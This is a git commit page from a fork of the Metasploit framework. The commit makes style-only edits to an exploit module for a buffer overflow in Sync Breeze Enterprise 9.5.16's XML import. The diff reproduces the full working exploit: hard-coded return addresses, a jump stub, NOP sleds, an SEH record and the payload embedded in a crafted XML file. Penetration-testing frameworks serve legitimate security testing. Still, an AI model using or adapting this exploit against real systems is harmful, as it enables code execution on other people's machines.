adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

ninja style changes

Browse Source
This commit is contained in:
bwatters-r7
2018-01-23 16:34:49 -06:00
parent 5fef8b43f6
commit 3922844650
1 changed files with 12 additions and 14 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/windows/fileformat/syncbreeze_xml.rb
+12 -14
View File
@@ -12,14 +12,14 @@ class MetasploitModule < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Sync Breeze Enterprise 9.5.16 - Import Command Buffer Overflow',
'Description' => %q{
'Description' => %q(
This module exploits a buffer overflow in Sync Breeze Enterprise 9.5.16
by using the import command option to import a specially crafted xml file.
},
),
'License' => MSF_LICENSE,
'Author' =>
[
'Daniel Teixeira',
'Daniel Teixeira'
],
'References' =>
[
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
'Targets' =>
[
['Windows Universal', {'Ret' => 0x10015FFE } ],
['Windows Universal', { 'Ret' => 0x10015FFE } ]
],
'Privileged' => false,
'DisclosureDate' => 'Mar 29 2017',
@@ -49,28 +49,26 @@ class MetasploitModule < Msf::Exploit::Remote
[
OptString.new('FILENAME', [true, 'The file name.', 'msf.xml'])
])
end
def exploit
jmpesp= "\x7A\xB7\x1B\x65" #JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" #LEA EAX, [ESP+76]
jmp = "\xFF\xE0" #JMP ESP
jmpesp = "\x7A\xB7\x1B\x65" # JMP ESP QtGui4.dll
esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76]
jmp = "\xFF\xE0" # JMP ESP
buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'"
buffer << "\x90"*1536
buffer << "\x90" * 1536
buffer << jmpesp
buffer << "\x90"*18
buffer << "\x90" * 18
buffer << esp
buffer << jmp
buffer << "\x90"*68
buffer << "\x90" * 68
buffer << generate_seh_record(target.ret)
buffer << "\x90"*10
buffer << "\x90" * 10
buffer << payload.encoded
buffer << "\x90"*5000
buffer << "\x90" * 5000
buffer << "\n</classify>"
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(buffer)
end